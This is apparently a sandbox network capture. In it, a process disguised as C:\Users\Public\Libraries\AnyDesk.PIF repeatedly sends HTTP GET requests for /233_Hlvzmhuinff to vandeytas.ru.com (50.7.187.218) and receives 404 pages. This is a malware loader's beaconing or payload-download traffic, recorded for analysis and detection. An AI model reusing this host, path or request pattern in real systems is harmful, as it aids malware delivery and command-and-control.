                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    12          192.168.2.4  49761        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2024-11-26 08:39:15 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:15 UTC  164                IN         HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:15 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    13          192.168.2.4  49763        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2024-11-26 08:39:17 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:17 UTC  164                IN         HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:17 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    14          192.168.2.4  49765        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2024-11-26 08:39:19 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:20 UTC  164                IN         HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:19 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    15          192.168.2.4  49767        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2024-11-26 08:39:21 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:22 UTC  164                IN         HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:22 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    16          192.168.2.4  49769        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2024-11-26 08:39:23 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:24 UTC  164                IN         HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:24 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    17          192.168.2.4  49771        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2024-11-26 08:39:26 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:26 UTC  164                IN         HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:26 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    18          192.168.2.4  49773        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2024-11-26 08:39:28 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:28 UTC  164                IN         HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:28 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    19          192.168.2.4  49775        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2024-11-26 08:39:30 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:31 UTC  164                IN         HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:30 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    20          192.168.2.4  49777        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2024-11-26 08:39:32 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:33 UTC  164                IN         HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:33 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    21          192.168.2.4  49779        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2024-11-26 08:39:34 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:35 UTC  164                IN         HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:35 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
22          192.168.2.4  49781        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp                Bytes transferred  Direction  Data
2024-11-26 08:39:36 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                       Host: vandeytas.ru.com
2024-11-26 08:39:37 UTC  164                IN         HTTP/1.1 404 Not Found
                                                       Date: Tue, 26 Nov 2024 08:39:37 GMT
                                                       Server: Apache
                                                       Content-Length: 315
                                                       Connection: close
                                                       Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:39:37 UTC  315                IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                       Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
23          192.168.2.4  49783        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp                Bytes transferred  Direction  Data
2024-11-26 08:39:39 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                       Host: vandeytas.ru.com
2024-11-26 08:39:39 UTC  164                IN         HTTP/1.1 404 Not Found
                                                       Date: Tue, 26 Nov 2024 08:39:39 GMT
                                                       Server: Apache
                                                       Content-Length: 315
                                                       Connection: close
                                                       Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:39:39 UTC  315                IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                       Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
24          192.168.2.4  49785        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp                Bytes transferred  Direction  Data
2024-11-26 08:39:41 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                       Host: vandeytas.ru.com
2024-11-26 08:39:41 UTC  164                IN         HTTP/1.1 404 Not Found
                                                       Date: Tue, 26 Nov 2024 08:39:41 GMT
                                                       Server: Apache
                                                       Content-Length: 315
                                                       Connection: close
                                                       Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:39:41 UTC  315                IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                       Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
25          192.168.2.4  49789        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp                Bytes transferred  Direction  Data
2024-11-26 08:39:43 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                       Host: vandeytas.ru.com
2024-11-26 08:39:43 UTC  164                IN         HTTP/1.1 404 Not Found
                                                       Date: Tue, 26 Nov 2024 08:39:43 GMT
                                                       Server: Apache
                                                       Content-Length: 315
                                                       Connection: close
                                                       Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:39:43 UTC  315                IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                       Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
26          192.168.2.4  49796        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp                Bytes transferred  Direction  Data
2024-11-26 08:39:45 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                       Host: vandeytas.ru.com
2024-11-26 08:39:46 UTC  164                IN         HTTP/1.1 404 Not Found
                                                       Date: Tue, 26 Nov 2024 08:39:46 GMT
                                                       Server: Apache
                                                       Content-Length: 315
                                                       Connection: close
                                                       Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:39:46 UTC  315                IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                       Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
27          192.168.2.4  49803        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp                Bytes transferred  Direction  Data
2024-11-26 08:39:47 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                       Host: vandeytas.ru.com
2024-11-26 08:39:48 UTC  164                IN         HTTP/1.1 404 Not Found
                                                       Date: Tue, 26 Nov 2024 08:39:48 GMT
                                                       Server: Apache
                                                       Content-Length: 315
                                                       Connection: close
                                                       Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:39:48 UTC  315                IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                       Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
28          192.168.2.4  49810        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp                Bytes transferred  Direction  Data
2024-11-26 08:39:50 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                       Host: vandeytas.ru.com
2024-11-26 08:39:50 UTC  164                IN         HTTP/1.1 404 Not Found
                                                       Date: Tue, 26 Nov 2024 08:39:50 GMT
                                                       Server: Apache
                                                       Content-Length: 315
                                                       Connection: close
                                                       Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:39:50 UTC  315                IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                       Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
29          192.168.2.4  49817        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp                Bytes transferred  Direction  Data
2024-11-26 08:39:52 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                       Host: vandeytas.ru.com
2024-11-26 08:39:52 UTC  164                IN         HTTP/1.1 404 Not Found
                                                       Date: Tue, 26 Nov 2024 08:39:52 GMT
                                                       Server: Apache
                                                       Content-Length: 315
                                                       Connection: close
                                                       Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:39:52 UTC  315                IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                       Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
30          192.168.2.4  49824        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp                Bytes transferred  Direction  Data
2024-11-26 08:39:54 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                       Host: vandeytas.ru.com
2024-11-26 08:39:54 UTC  164                IN         HTTP/1.1 404 Not Found
                                                       Date: Tue, 26 Nov 2024 08:39:54 GMT
                                                       Server: Apache
                                                       Content-Length: 315
                                                       Connection: close
                                                       Content-Type: text/html; charset=iso-8859-1
